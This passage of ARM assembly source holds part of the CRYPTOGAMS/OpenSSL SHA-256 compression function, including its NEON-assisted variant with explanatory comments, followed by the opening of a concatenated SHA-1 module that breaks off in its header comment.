add r6,r6,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#14*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#7*4]
add r12,r12,r0
eor r0,r10,r10,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r10,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#14*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 30==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 30<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#0*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#13*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#0*4] @ 31
@ ldr r1,[sp,#13*4]
mov r0,r2,ror#7
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#15*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#8*4]
add r3,r3,r0
eor r0,r9,r9,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r9,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#15*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 31==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 31<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#1*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#14*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
#ifdef __thumb2__
ite eq @ Thumb2 thing, sanity check in ARM
#endif
ldreq r3,[sp,#16*4] @ pull ctx
bne .Lrounds_16_xx
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldr r0,[r3,#0]
ldr r2,[r3,#4]
ldr r12,[r3,#8]
add r4,r4,r0
ldr r0,[r3,#12]
add r5,r5,r2
ldr r2,[r3,#16]
add r6,r6,r12
ldr r12,[r3,#20]
add r7,r7,r0
ldr r0,[r3,#24]
add r8,r8,r2
ldr r2,[r3,#28]
add r9,r9,r12
ldr r1,[sp,#17*4] @ pull inp
ldr r12,[sp,#18*4] @ pull inp+len
add r10,r10,r0
add r11,r11,r2
stmia r3,{r4,r5,r6,r7,r8,r9,r10,r11}
cmp r1,r12
sub r14,r14,#256 @ rewind Ktbl
bne .Loop
add sp,sp,#19*4 @ destroy frame
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_sha256_block_data_order,.-cryptogams_sha256_block_data_order
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
@-----------------------------------------------------------------------
@ void cryptogams_sha256_block_data_order_neon(u32 ctx[8],
@                                              const void *inp,
@                                              size_t num_blocks)
@ NEON-assisted SHA-256 compression function (CRYPTOGAMS style).
@ In:  r0 = ctx (8 x u32 state words a..h), r1 = input, r2 = block count
@ The scalar ALU runs the 64 rounds (working state a..h lives in
@ r4..r11; r0/r2/r3/r12 are round scratch), while the NEON unit holds
@ the 16-word message block in q0-q3 and computes the sigma0/sigma1
@ message-schedule expansion in parallel.  Each K256[i]+X[i] sum is
@ pre-added on NEON (vadd into q8) and staged on the stack, from where
@ the scalar rounds consume it via ldr r2,[sp,#i*4].
@ Stack frame: 16*4 bytes of staged schedule, then saved
@ {ctx, inp, inp_end, original sp} at sp+64/68/72/76; sp itself is
@ realigned to 16 bytes so the :128-aligned vst1.32 stores are legal.
@-----------------------------------------------------------------------
.globl cryptogams_sha256_block_data_order_neon
.type cryptogams_sha256_block_data_order_neon,%function
.align 5
.skip 16
cryptogams_sha256_block_data_order_neon:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
sub r11,sp,#16*4+16
adr r14,K256
bic r11,r11,#15 @ align for 128-bit stores
mov r12,sp
mov sp,r11 @ alloca
add r2,r1,r2,lsl#6 @ len to point at the end of inp
@ Load the first 64-byte block and the first 16 round constants,
@ byte-swap the message words, pre-add K+X and stage them at [sp].
vld1.8 {q0},[r1]!
vld1.8 {q1},[r1]!
vld1.8 {q2},[r1]!
vld1.8 {q3},[r1]!
vld1.32 {q8},[r14,:128]!
vld1.32 {q9},[r14,:128]!
vld1.32 {q10},[r14,:128]!
vld1.32 {q11},[r14,:128]!
vrev32.8 q0,q0 @ yes, even on
str r0,[sp,#64]
vrev32.8 q1,q1 @ big-endian
str r1,[sp,#68]
mov r1,sp
vrev32.8 q2,q2
str r2,[sp,#72]
vrev32.8 q3,q3
str r12,[sp,#76] @ save original sp
vadd.i32 q8,q8,q0
vadd.i32 q9,q9,q1
vst1.32 {q8},[r1,:128]!
vadd.i32 q10,q10,q2
vst1.32 {q9},[r1,:128]!
vadd.i32 q11,q11,q3
vst1.32 {q10},[r1,:128]!
vst1.32 {q11},[r1,:128]!
ldmia r0,{r4,r5,r6,r7,r8,r9,r10,r11}
sub r1,r1,#64
ldr r2,[sp,#0]
eor r12,r12,r12
eor r3,r5,r6
b .L_00_48
.align 4
@ Rounds 0..47: four iterations of this loop body; each pass performs
@ 16 scalar rounds interleaved with the NEON expansion of the next
@ 16 schedule words (vext/vshr/vsli implement sigma0/sigma1).
.L_00_48:
vext.8 q8,q0,q1,#4
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
vext.8 q9,q2,q3,#4
add r4,r4,r12
and r2,r2,r8
eor r12,r0,r8,ror#19
vshr.u32 q10,q8,#7
eor r0,r4,r4,ror#11
eor r2,r2,r10
vadd.i32 q0,q0,q9
add r11,r11,r12,ror#6
eor r12,r4,r5
vshr.u32 q9,q8,#3
eor r0,r0,r4,ror#20
add r11,r11,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#4]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
veor q9,q9,q10
add r10,r10,r2
vsli.32 q11,q8,#14
eor r2,r8,r9
eor r0,r7,r7,ror#5
vshr.u32 d24,d7,#17
add r11,r11,r3
and r2,r2,r7
veor q9,q9,q11
eor r3,r0,r7,ror#19
eor r0,r11,r11,ror#11
vsli.32 d24,d7,#15
eor r2,r2,r9
add r10,r10,r3,ror#6
vshr.u32 d25,d7,#10
eor r3,r11,r4
eor r0,r0,r11,ror#20
vadd.i32 q0,q0,q9
add r10,r10,r2
ldr r2,[sp,#8]
veor d25,d25,d24
and r12,r12,r3
add r6,r6,r10
vshr.u32 d24,d7,#19
add r10,r10,r0,ror#2
eor r12,r12,r4
vsli.32 d24,d7,#13
add r9,r9,r2
eor r2,r7,r8
veor d25,d25,d24
eor r0,r6,r6,ror#5
add r10,r10,r12
vadd.i32 d0,d0,d25
and r2,r2,r6
eor r12,r0,r6,ror#19
vshr.u32 d24,d0,#17
eor r0,r10,r10,ror#11
eor r2,r2,r8
vsli.32 d24,d0,#15
add r9,r9,r12,ror#6
eor r12,r10,r11
vshr.u32 d25,d0,#10
eor r0,r0,r10,ror#20
add r9,r9,r2
veor d25,d25,d24
ldr r2,[sp,#12]
and r3,r3,r12
vshr.u32 d24,d0,#19
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
vld1.32 {q8},[r14,:128]!
add r8,r8,r2
vsli.32 d24,d0,#13
eor r2,r6,r7
eor r0,r5,r5,ror#5
veor d25,d25,d24
add r9,r9,r3
and r2,r2,r5
vadd.i32 d1,d1,d25
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
vadd.i32 q8,q8,q0
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#16]
and r12,r12,r3
add r4,r4,r8
vst1.32 {q8},[r1,:128]!
add r8,r8,r0,ror#2
eor r12,r12,r10
vext.8 q8,q1,q2,#4
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
vext.8 q9,q3,q0,#4
add r8,r8,r12
and r2,r2,r4
eor r12,r0,r4,ror#19
vshr.u32 q10,q8,#7
eor r0,r8,r8,ror#11
eor r2,r2,r6
vadd.i32 q1,q1,q9
add r7,r7,r12,ror#6
eor r12,r8,r9
vshr.u32 q9,q8,#3
eor r0,r0,r8,ror#20
add r7,r7,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#20]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
veor q9,q9,q10
add r6,r6,r2
vsli.32 q11,q8,#14
eor r2,r4,r5
eor r0,r11,r11,ror#5
vshr.u32 d24,d1,#17
add r7,r7,r3
and r2,r2,r11
veor q9,q9,q11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
vsli.32 d24,d1,#15
eor r2,r2,r5
add r6,r6,r3,ror#6
vshr.u32 d25,d1,#10
eor r3,r7,r8
eor r0,r0,r7,ror#20
vadd.i32 q1,q1,q9
add r6,r6,r2
ldr r2,[sp,#24]
veor d25,d25,d24
and r12,r12,r3
add r10,r10,r6
vshr.u32 d24,d1,#19
add r6,r6,r0,ror#2
eor r12,r12,r8
vsli.32 d24,d1,#13
add r5,r5,r2
eor r2,r11,r4
veor d25,d25,d24
eor r0,r10,r10,ror#5
add r6,r6,r12
vadd.i32 d2,d2,d25
and r2,r2,r10
eor r12,r0,r10,ror#19
vshr.u32 d24,d2,#17
eor r0,r6,r6,ror#11
eor r2,r2,r4
vsli.32 d24,d2,#15
add r5,r5,r12,ror#6
eor r12,r6,r7
vshr.u32 d25,d2,#10
eor r0,r0,r6,ror#20
add r5,r5,r2
veor d25,d25,d24
ldr r2,[sp,#28]
and r3,r3,r12
vshr.u32 d24,d2,#19
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
vld1.32 {q8},[r14,:128]!
add r4,r4,r2
vsli.32 d24,d2,#13
eor r2,r10,r11
eor r0,r9,r9,ror#5
veor d25,d25,d24
add r5,r5,r3
and r2,r2,r9
vadd.i32 d3,d3,d25
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
vadd.i32 q8,q8,q1
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[sp,#32]
and r12,r12,r3
add r8,r8,r4
vst1.32 {q8},[r1,:128]!
add r4,r4,r0,ror#2
eor r12,r12,r6
vext.8 q8,q2,q3,#4
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
vext.8 q9,q0,q1,#4
add r4,r4,r12
and r2,r2,r8
eor r12,r0,r8,ror#19
vshr.u32 q10,q8,#7
eor r0,r4,r4,ror#11
eor r2,r2,r10
vadd.i32 q2,q2,q9
add r11,r11,r12,ror#6
eor r12,r4,r5
vshr.u32 q9,q8,#3
eor r0,r0,r4,ror#20
add r11,r11,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#36]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
veor q9,q9,q10
add r10,r10,r2
vsli.32 q11,q8,#14
eor r2,r8,r9
eor r0,r7,r7,ror#5
vshr.u32 d24,d3,#17
add r11,r11,r3
and r2,r2,r7
veor q9,q9,q11
eor r3,r0,r7,ror#19
eor r0,r11,r11,ror#11
vsli.32 d24,d3,#15
eor r2,r2,r9
add r10,r10,r3,ror#6
vshr.u32 d25,d3,#10
eor r3,r11,r4
eor r0,r0,r11,ror#20
vadd.i32 q2,q2,q9
add r10,r10,r2
ldr r2,[sp,#40]
veor d25,d25,d24
and r12,r12,r3
add r6,r6,r10
vshr.u32 d24,d3,#19
add r10,r10,r0,ror#2
eor r12,r12,r4
vsli.32 d24,d3,#13
add r9,r9,r2
eor r2,r7,r8
veor d25,d25,d24
eor r0,r6,r6,ror#5
add r10,r10,r12
vadd.i32 d4,d4,d25
and r2,r2,r6
eor r12,r0,r6,ror#19
vshr.u32 d24,d4,#17
eor r0,r10,r10,ror#11
eor r2,r2,r8
vsli.32 d24,d4,#15
add r9,r9,r12,ror#6
eor r12,r10,r11
vshr.u32 d25,d4,#10
eor r0,r0,r10,ror#20
add r9,r9,r2
veor d25,d25,d24
ldr r2,[sp,#44]
and r3,r3,r12
vshr.u32 d24,d4,#19
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
vld1.32 {q8},[r14,:128]!
add r8,r8,r2
vsli.32 d24,d4,#13
eor r2,r6,r7
eor r0,r5,r5,ror#5
veor d25,d25,d24
add r9,r9,r3
and r2,r2,r5
vadd.i32 d5,d5,d25
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
vadd.i32 q8,q8,q2
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#48]
and r12,r12,r3
add r4,r4,r8
vst1.32 {q8},[r1,:128]!
add r8,r8,r0,ror#2
eor r12,r12,r10
vext.8 q8,q3,q0,#4
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
vext.8 q9,q1,q2,#4
add r8,r8,r12
and r2,r2,r4
eor r12,r0,r4,ror#19
vshr.u32 q10,q8,#7
eor r0,r8,r8,ror#11
eor r2,r2,r6
vadd.i32 q3,q3,q9
add r7,r7,r12,ror#6
eor r12,r8,r9
vshr.u32 q9,q8,#3
eor r0,r0,r8,ror#20
add r7,r7,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#52]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
veor q9,q9,q10
add r6,r6,r2
vsli.32 q11,q8,#14
eor r2,r4,r5
eor r0,r11,r11,ror#5
vshr.u32 d24,d5,#17
add r7,r7,r3
and r2,r2,r11
veor q9,q9,q11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
vsli.32 d24,d5,#15
eor r2,r2,r5
add r6,r6,r3,ror#6
vshr.u32 d25,d5,#10
eor r3,r7,r8
eor r0,r0,r7,ror#20
vadd.i32 q3,q3,q9
add r6,r6,r2
ldr r2,[sp,#56]
veor d25,d25,d24
and r12,r12,r3
add r10,r10,r6
vshr.u32 d24,d5,#19
add r6,r6,r0,ror#2
eor r12,r12,r8
vsli.32 d24,d5,#13
add r5,r5,r2
eor r2,r11,r4
veor d25,d25,d24
eor r0,r10,r10,ror#5
add r6,r6,r12
vadd.i32 d6,d6,d25
and r2,r2,r10
eor r12,r0,r10,ror#19
vshr.u32 d24,d6,#17
eor r0,r6,r6,ror#11
eor r2,r2,r4
vsli.32 d24,d6,#15
add r5,r5,r12,ror#6
eor r12,r6,r7
vshr.u32 d25,d6,#10
eor r0,r0,r6,ror#20
add r5,r5,r2
veor d25,d25,d24
ldr r2,[sp,#60]
and r3,r3,r12
vshr.u32 d24,d6,#19
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
vld1.32 {q8},[r14,:128]!
add r4,r4,r2
vsli.32 d24,d6,#13
eor r2,r10,r11
eor r0,r9,r9,ror#5
veor d25,d25,d24
add r5,r5,r3
and r2,r2,r9
vadd.i32 d7,d7,d25
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
vadd.i32 q8,q8,q3
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[r14]
and r12,r12,r3
add r8,r8,r4
vst1.32 {q8},[r1,:128]!
add r4,r4,r0,ror#2
eor r12,r12,r6
teq r2,#0 @ check for K256 terminator
ldr r2,[sp,#0]
sub r1,r1,#64
bne .L_00_48
@ Rounds 48..63: the schedule is fully expanded.  Prefetch the next
@ input block now (re-reading the last block instead when at the end,
@ to avoid reading past the input — "avoid SEGV"), byte-swap it and
@ pre-add the first K constants while the scalar rounds finish.
ldr r1,[sp,#68]
ldr r0,[sp,#72]
sub r14,r14,#256 @ rewind r14
teq r1,r0
it eq
subeq r1,r1,#64 @ avoid SEGV
vld1.8 {q0},[r1]! @ load next input block
vld1.8 {q1},[r1]!
vld1.8 {q2},[r1]!
vld1.8 {q3},[r1]!
it ne
strne r1,[sp,#68]
mov r1,sp
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
add r4,r4,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r8
eor r12,r0,r8,ror#19
eor r0,r4,r4,ror#11
eor r2,r2,r10
vrev32.8 q0,q0
add r11,r11,r12,ror#6
eor r12,r4,r5
eor r0,r0,r4,ror#20
add r11,r11,r2
vadd.i32 q8,q8,q0
ldr r2,[sp,#4]
and r3,r3,r12
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
add r10,r10,r2
eor r2,r8,r9
eor r0,r7,r7,ror#5
add r11,r11,r3
and r2,r2,r7
eor r3,r0,r7,ror#19
eor r0,r11,r11,ror#11
eor r2,r2,r9
add r10,r10,r3,ror#6
eor r3,r11,r4
eor r0,r0,r11,ror#20
add r10,r10,r2
ldr r2,[sp,#8]
and r12,r12,r3
add r6,r6,r10
add r10,r10,r0,ror#2
eor r12,r12,r4
add r9,r9,r2
eor r2,r7,r8
eor r0,r6,r6,ror#5
add r10,r10,r12
and r2,r2,r6
eor r12,r0,r6,ror#19
eor r0,r10,r10,ror#11
eor r2,r2,r8
add r9,r9,r12,ror#6
eor r12,r10,r11
eor r0,r0,r10,ror#20
add r9,r9,r2
ldr r2,[sp,#12]
and r3,r3,r12
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
add r8,r8,r2
eor r2,r6,r7
eor r0,r5,r5,ror#5
add r9,r9,r3
and r2,r2,r5
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#16]
and r12,r12,r3
add r4,r4,r8
add r8,r8,r0,ror#2
eor r12,r12,r10
vst1.32 {q8},[r1,:128]!
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
add r8,r8,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r4
eor r12,r0,r4,ror#19
eor r0,r8,r8,ror#11
eor r2,r2,r6
vrev32.8 q1,q1
add r7,r7,r12,ror#6
eor r12,r8,r9
eor r0,r0,r8,ror#20
add r7,r7,r2
vadd.i32 q8,q8,q1
ldr r2,[sp,#20]
and r3,r3,r12
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
add r6,r6,r2
eor r2,r4,r5
eor r0,r11,r11,ror#5
add r7,r7,r3
and r2,r2,r11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
eor r2,r2,r5
add r6,r6,r3,ror#6
eor r3,r7,r8
eor r0,r0,r7,ror#20
add r6,r6,r2
ldr r2,[sp,#24]
and r12,r12,r3
add r10,r10,r6
add r6,r6,r0,ror#2
eor r12,r12,r8
add r5,r5,r2
eor r2,r11,r4
eor r0,r10,r10,ror#5
add r6,r6,r12
and r2,r2,r10
eor r12,r0,r10,ror#19
eor r0,r6,r6,ror#11
eor r2,r2,r4
add r5,r5,r12,ror#6
eor r12,r6,r7
eor r0,r0,r6,ror#20
add r5,r5,r2
ldr r2,[sp,#28]
and r3,r3,r12
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
add r4,r4,r2
eor r2,r10,r11
eor r0,r9,r9,ror#5
add r5,r5,r3
and r2,r2,r9
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[sp,#32]
and r12,r12,r3
add r8,r8,r4
add r4,r4,r0,ror#2
eor r12,r12,r6
vst1.32 {q8},[r1,:128]!
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
add r4,r4,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r8
eor r12,r0,r8,ror#19
eor r0,r4,r4,ror#11
eor r2,r2,r10
vrev32.8 q2,q2
add r11,r11,r12,ror#6
eor r12,r4,r5
eor r0,r0,r4,ror#20
add r11,r11,r2
vadd.i32 q8,q8,q2
ldr r2,[sp,#36]
and r3,r3,r12
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
add r10,r10,r2
eor r2,r8,r9
eor r0,r7,r7,ror#5
add r11,r11,r3
and r2,r2,r7
eor r3,r0,r7,ror#19
eor r0,r11,r11,ror#11
eor r2,r2,r9
add r10,r10,r3,ror#6
eor r3,r11,r4
eor r0,r0,r11,ror#20
add r10,r10,r2
ldr r2,[sp,#40]
and r12,r12,r3
add r6,r6,r10
add r10,r10,r0,ror#2
eor r12,r12,r4
add r9,r9,r2
eor r2,r7,r8
eor r0,r6,r6,ror#5
add r10,r10,r12
and r2,r2,r6
eor r12,r0,r6,ror#19
eor r0,r10,r10,ror#11
eor r2,r2,r8
add r9,r9,r12,ror#6
eor r12,r10,r11
eor r0,r0,r10,ror#20
add r9,r9,r2
ldr r2,[sp,#44]
and r3,r3,r12
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
add r8,r8,r2
eor r2,r6,r7
eor r0,r5,r5,ror#5
add r9,r9,r3
and r2,r2,r5
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#48]
and r12,r12,r3
add r4,r4,r8
add r8,r8,r0,ror#2
eor r12,r12,r10
vst1.32 {q8},[r1,:128]!
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
add r8,r8,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r4
eor r12,r0,r4,ror#19
eor r0,r8,r8,ror#11
eor r2,r2,r6
vrev32.8 q3,q3
add r7,r7,r12,ror#6
eor r12,r8,r9
eor r0,r0,r8,ror#20
add r7,r7,r2
vadd.i32 q8,q8,q3
ldr r2,[sp,#52]
and r3,r3,r12
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
add r6,r6,r2
eor r2,r4,r5
eor r0,r11,r11,ror#5
add r7,r7,r3
and r2,r2,r11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
eor r2,r2,r5
add r6,r6,r3,ror#6
eor r3,r7,r8
eor r0,r0,r7,ror#20
add r6,r6,r2
ldr r2,[sp,#56]
and r12,r12,r3
add r10,r10,r6
add r6,r6,r0,ror#2
eor r12,r12,r8
add r5,r5,r2
eor r2,r11,r4
eor r0,r10,r10,ror#5
add r6,r6,r12
and r2,r2,r10
eor r12,r0,r10,ror#19
eor r0,r6,r6,ror#11
eor r2,r2,r4
add r5,r5,r12,ror#6
eor r12,r6,r7
eor r0,r0,r6,ror#20
add r5,r5,r2
ldr r2,[sp,#60]
and r3,r3,r12
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
add r4,r4,r2
eor r2,r10,r11
eor r0,r9,r9,ror#5
add r5,r5,r3
and r2,r2,r9
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[sp,#64]
and r12,r12,r3
add r8,r8,r4
add r4,r4,r0,ror#2
eor r12,r12,r6
vst1.32 {q8},[r1,:128]!
@ Block done: r2 = ctx pointer (saved at sp+64).  Accumulate the
@ working state a..h (r4..r11) into the 8 context words and store.
ldr r0,[r2,#0]
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldr r12,[r2,#4]
ldr r3,[r2,#8]
ldr r1,[r2,#12]
add r4,r4,r0 @ accumulate
ldr r0,[r2,#16]
add r5,r5,r12
ldr r12,[r2,#20]
add r6,r6,r3
ldr r3,[r2,#24]
add r7,r7,r1
ldr r1,[r2,#28]
add r8,r8,r0
str r4,[r2],#4
add r9,r9,r12
str r5,[r2],#4
add r10,r10,r3
str r6,[r2],#4
add r11,r11,r1
str r7,[r2],#4
stmia r2,{r8,r9,r10,r11}
@ More input left (ne)?  Reset the schedule pointer and loop; else
@ restore the caller's sp and return.
ittte ne
movne r1,sp
ldrne r2,[sp,#0]
eorne r12,r12,r12
ldreq sp,[sp,#76] @ restore original sp
itt ne
eorne r3,r5,r6
bne .L_00_48
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
.size cryptogams_sha256_block_data_order_neon,.-cryptogams_sha256_block_data_order_neon
#endif
@ ---------------------------------------------------------------------
@ End of the SHA-256 module.  The SHA-1 module below originates from a
@ separate source file (external/cryptopp/sha1_armv4.S, repo
@ "Akhil-Sharma-26/yeet", 29,134 bytes); raw concatenation metadata
@ converted to comments so the file remains assemblable.
@ ---------------------------------------------------------------------
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define CRYPTOGAMS_ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__)
.syntax unified
.thumb
#else
.code 32
#endif
.text
.align 5
@-----------------------------------------------------------------------
@ void cryptogams_sha1_block_data_order(u32 ctx[5], const void *inp,
@                                       size_t num_blocks)
@ Pure-integer SHA-1 compression function (CRYPTOGAMS style).
@ In:  r0 = ctx (5 x u32 state words A..E), r1 = input, r2 = block count
